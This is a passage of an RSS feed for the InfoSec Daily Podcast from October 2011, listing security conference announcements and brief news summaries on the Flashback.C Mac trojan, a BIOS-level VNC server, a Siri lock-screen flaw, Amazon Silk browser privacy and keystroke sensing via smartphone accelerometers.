	<a href="http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2011 Fall Information Security Conference</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 8 &#8211; 9, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA (Loudermilk Conference Center)<br class="kix-line-break" /><br />
	</span><a href="http://www.gaissa.org/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.gaissa.org</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Delaware</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 11-12, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Wilmington University, Delaware Campus</span><br />
	<a href="http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://techland.time.com/2011/10/19/mac-malwares-back/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://techland.time.com/2011/10/19/mac-malwares-back/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Like a horror movie intruder who cuts the phone lines, a new strain of Mac malware can prevent the system from getting help.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Researchers at security firm F-Secure discovered the new</span><a href="http://www.f-secure.com/weblog/archives/00002256.html"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Mac trojan</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, dubbed Trojan-Downloader:OSX/Flashback.C. Like most other Mac malware, this variant masquerades as legitimate software&#8211;in this case, Adobe Flash&#8211;in an attempt to get willingly installed by the user.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If the user goes through with the installation and enters an administrator password, Flashback.C will overwrite the mechanism Macs use to download anti-malware updates from Apple. In other words, the system gets cut off from the protection it needs, not only against Flashback.C, but against future malware attacks.</span></p>
<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.engadget.com/2011/09/19/realvnc-demos-bios-based-server-at-idf-2011-video/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.engadget.com/2011/09/19/realvnc-demos-bios-based-server-at-idf-2011-video/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">VNC (Virtual Network Computing) is one of the of oldest remote desktop solutions around, and while its RFB (remote framebuffer) protocol can require a little more bandwidth than the competition, it&#39;s long been praised for its broad cross-platform support and elegant simplicity. </span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Last year, RealVNC teamed up with Intel to incorporate a bona fide VNC server (using hardware encryption native to vPro chipsets) into the oldest bit of PC firmware &#8212; the BIOS. As such, you can securely control a remote computer&#39;s BIOS, mount a disk image, and install an OS from the comfort of your living room halfway across the globe. The future is now &#8212; you&#39;re welcome. Take a look at RealVNC&#39;s IDF 2011 demo in the gallery below and our hand-on video after the break.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Geordy&rsquo;s comments</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: What could possibly go wrong?!?</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://news.hitb.org/content/siri-security-flaw-iphone-4s"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.hitb.org/content/siri-security-flaw-iphone-4s</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">One of the major new features of the iPhone 4S is Siri, the voice controlled assistant which lets you operate various functions of the phone simply by talking to it.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">However, there are a couple of points to be wary of when it comes to Siri. The first being that the system isn&rsquo;t actually fully implemented in the UK, with no localized provider yet signed up for location-based information such as asking Siri where the nearest Indian restaurant is.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The second is a more serious security matter, which is that Siri comes with a default setting that grants access to your locked iPhone. So even if you&rsquo;ve set up a passcode on your device, anyone can bypass that lock simply by holding down the Home button to activate Siri, then send an embarrassing text via voice dictation.</span></p>
<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="https://www.eff.org/2011/october/amazon-fire%E2%80%99s-new-browser-puts-spotlight-privacy-trade-offs"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.eff.org/2011/october/amazon-fire%E2%80%99s-new-browser-puts-spotlight-privacy-trade-offs</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Amazon recently announced that the new Kindle Fire tablet will ship with a brand new browser called Silk. The Silk browser works in &ldquo;cloud acceleration&rdquo; mode by routing most webpage requests through servers controlled by Amazon. The idea is to capitalize on Amazon&rsquo;s powerful AWS cloud servers to parallelize and hence speed up downloading web page elements, and then pass that information back to the tablet through a persistent connection using the SPDY protocol. This protocol is generally faster than the standard HTTP protocol. This split-browser idea, not unique to Amazon, is a departure from the way major browsers work today.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Following the announcement, security experts as well as lawmakers have raised privacy questions and concerns about Silk. After all, while in cloud acceleration mode, the user is trusting Amazon with an incredible amount of information. This is because Amazon is sitting in the middle of most communications between a user&#39;s Fire tablet on the one hand, and the website she chooses to visit on the other. This puts Amazon in a position to track a user&#39;s browsing habits and possibly sensitive content. As there were a lot of questions that the Silk announcement left unresolved, we decided to follow up with Amazon to learn more about the privacy implications.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Our conversation with Amazon allayed many of our major concerns. Cloud acceleration mode is the default setting, but Amazon has assured us it will be easy to turn off on the first page of the browser settings menu. When turned off, Silk operates as a normal web browser, sending the requests directly to the web sites you are visiting. Regarding cloud acceleration mode, here is what we found out:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Amazon does not intercept encrypted traffic, so your communications over HTTPS would not be accelerated or tracked. According to Jon Jenkins, director of Silk development, &ldquo;secure web page requests (SSL) are routed directly from the Kindle Fire to the origin server and do not pass through Amazon&rsquo;s EC2 servers.&rdquo; In other words, no HTTPS requests will ever use cloud acceleration mode. Given the prevalence of web pages served over HTTPS, this gives Amazon good incentive to make Silk fast and usable even when cloud acceleration is off. Turning it off completely should be a viable option for users.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Please get involved by </span><a href="https://whohasyourback.eff.org/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">signing our petition</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and sharing it with others.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.gatech.edu/newsroom/release.html?nid=71506"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.gatech.edu/newsroom/release.html?nid=71506</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&rsquo;s a pattern that no doubt repeats itself daily in hundreds of millions of offices around the world: People sit down, turn on their computers, set their mobile phones on their desks and begin to work. What if a hacker could use that phone to track what the person was typing on the keyboard just inches away?</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A research team at Georgia Tech has discovered how to do exactly that, using a smartphone accelerometer&mdash;the internal device that detects when and how the phone is tilted&mdash;to sense keyboard vibrations and decipher complete sentences with up to 80 percent accuracy. The procedure is not easy, they say, but is definitely possible with the latest generations of smartphones.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;We first tried our experiments with an iPhone 3GS, and the results were difficult to read,&rdquo; said Patrick Traynor, assistant professor in Georgia Tech&rsquo;s School of Computer Science. &ldquo;But then we tried an iPhone 4, which has an added gyroscope to clean up the accelerometer noise, and the results were much better. We believe that most smartphones made in the past two years are sophisticated enough to launch this attack.&rdquo;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://www.apple.com/stevejobs/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.apple.com/stevejobs/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Over a million people from all over the world have shared their memories, thoughts, and feelings about Steve. One thing they all have in common &mdash; from personal friends to colleagues to owners of Apple products &mdash; is how they&rsquo;ve been touched by his passion and creativity. You can view some of these messages below.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">And share your own at rememberingsteve@apple.com</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-498-more-mac-malware-vnc-bios-siri%e2%80%99s-side-entrance-eff-silk-spiphone-remembering/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/2983/0/infosec-daily-podcast-episode-498.mp3" length="18320758" type="audio/mpeg" />
		<itunes:duration>0:00:01</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 498 for October 19, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, and Boris Sverdlik.
	Announcements:
	Hack3rCon 2011
	When: October 21-23rd, 2011
	Where: the Charleston House Hotel and Conference Center
	h[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 498 for October 19, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, and Boris Sverdlik.
	Announcements:
	Hack3rCon 2011
	When: October 21-23rd, 2011
	Where: the Charleston House Hotel and Conference Center
	http://www.hack3rcon.org/
	NordSec 2011
	When: October 26&#8211;28, 2011
	Where: Tallinn Science Park &#8220;Tehnopol&#8221;, Tallinn, Estonia
	http://nordsec2011.cyber.ee/
	New Hampshire InfoSec Tweetup
	When: October 29, 2011
	Where: Pawtuckaway State Park in Nottingham, NH
	http://nhinfosectweetup.eventbrite.com/ 
	( It is just a gathering of security professionals and their families. &#160;No talks, just a bunch of likeminded people and some good food.)
	SkyDogCon
	When: Nov 4th &#8211; Nov 6th
	Where: Holiday Inn Airport, Nashville, TN
	http://www.skydogcon.com
	Phreaknic
	When: Nov 4th &#8211; Nov 6th
	Where: Days Inn Stadium, Nashville, TN
	http://www.phreaknic.info
	BsidesATL 2011
	When: November 4th, 2011
	Where: Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg).
	http://www.securitybsides.com/w/page/44893559/BSidesATL-2011
	This year there will be 3 tracks, a CISO panel on some good topics recently (Hacker vs Biz Skillset, etc), Lockpick Village by FALE, Prize Giveaway at End. &#160;Of course all day Podcast Area.
	BSidesDFW 2011
	When: November 5th, 2011
	Where: Microsoft Technology Center Dallas
	http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011
	2011 Fall Information Security Conference
	When: &#160;November 8 &#8211; 9, 2011
	Where: Atlanta, GA (Loudermilk Conference Center)
	http://www.gaissa.org
	BSides Delaware
	When: November 11-12, 2011
	Where: Wilmington University, Delaware Campus
	http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: http://techland.time.com/2011/10/19/mac-malwares-back/
	Like a horror movie intruder who cuts the phone lines, a new strain of Mac malware can prevent the system from getting help.
	Researchers at security firm F-Secure discovered the new Mac trojan, dubbed Trojan-Downloader:OSX/Flashback.C. Like most other Mac malware, this variant masquerades as legitimate software&#8211;in this case, Adobe Flash&#8211;in an attempt to get willingly installed by the user.
	If the user goes through with the installation and enters an administrator password, Flashback.C will overwrite the mechanism Macs use to download anti-malware updates from Apple. In other words, the system gets cut off from the protection it needs, not only against Flashback.C, but against future malware attacks.

	Source: http://www.engadget.com/2011/09/19/realvnc-demos-bios-based-server-at-idf-2011-video/
	VNC (Virtual Network Computing) is one of the of oldest remote desktop solutions around, and while its RFB (remote framebuffer) protocol can require a little more bandwidth than the competition, it&#39;s long been praised for its broad cross-platform support and elegant simplicity. 
	Last year, RealVNC teamed up with Intel to incorporate a bona fide VNC server (using hardware encryption native to vPro chipsets) into the oldest bit of PC firmware &#8212; the BIOS. As such, you can securely control a remote computer&#39;s BIOS, mount a disk image, and install an OS from the comfort of your living room halfway across the globe. The future is now &#8212; you&#39;re welcome. Take a look at RealVNC&#39;s IDF 2011 demo in the gallery below and our hand-on video after the break.
	Geordy&#8217;s comments: What could possibly go wrong?!?
	Source: http://news.hitb.org/content/siri-security-flaw-iphone-4s 
	One of the major new features of the iPhone 4S is Siri, the voice controlled assistant which lets you operate variou[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 497 &#8211;  Stuxnet-ng, Backseat != Iron Mountain, Holding an ID Hostage, NFC Entry, Skype 0-day &amp; Anonymous SCADA</title>
		<link>http://www.isdpodcast.com/episode-497-stuxnet-ng-backseat-iron-mountain-holding-an-id-hostage-nfc-entry-skype-0-day-anonymous-scada</link>
		<comments>http://www.isdpodcast.com/episode-497-stuxnet-ng-backseat-iron-mountain-holding-an-id-hostage-nfc-entry-skype-0-day-anonymous-scada#comments</comments>
		<pubDate>Wed, 19 Oct 2011 00:55:32 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=2980</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 497 for October 18, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Themson Mester, and Varun Sharma. Announcements: Hack3rCon 2011 When: October 21-23rd, 2011 Where: the Charleston House Hotel and Conference Center http://www.hack3rcon.org/ NordSec 2011 When: October 26&#8211;28, 2011 Where: Tallinn Science Park &#8220;Tehnopol&#8221;, Tallinn, Estonia http://nordsec2011.cyber.ee/ [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 497 for October 18, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Themson Mester, and Varun Sharma.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hack3rCon 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 21-23rd, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: the Charleston House Hotel and Conference Center</span><br />
	<a href="http://www.hack3rcon.org/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.hack3rcon.org/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">NordSec 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 26&ndash;28, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Tallinn Science Park &ldquo;Tehnopol&rdquo;, Tallinn, Estonia</span><br />
	<a href="http://nordsec2011.cyber.ee/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nordsec2011.cyber.ee/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New Hampshire InfoSec Tweetup</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 29, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Pawtuckaway State Park in Nottingham, NH</span><br />
	<a href="http://nhinfosectweetup.eventbrite.com/%20"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nhinfosectweetup.eventbrite.com/ </span></a><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">( It is just a gathering of security professionals and their families. &nbsp;No talks, just abunch of likeminded people and some good food.)</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SkyDogCon</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Holiday Inn Airport, Nashville, TN</span><br />
	<a href="http://www.skydogcon.com/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Phreaknic</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Days Inn Stadium, Nashville, TN</span><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.phreaknic.info</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BsidesATL 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 4th, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg).</span></a><br />
	<a href="http://www.securitybsides.com/w/page/44893559/BSidesATL-2011"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/44893559/BSidesATL-2011</span></a><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This year there will be 3 tracks, a CISO panel on some good topics recently (Hacker vs Biz Skillset, etc), Lockpick Village by FALE, Prize Giveaway at End. &nbsp;Of course all day Podcast Area.</span></p>
<p>	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSidesDFW 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 5th, 2011</span></a><br />
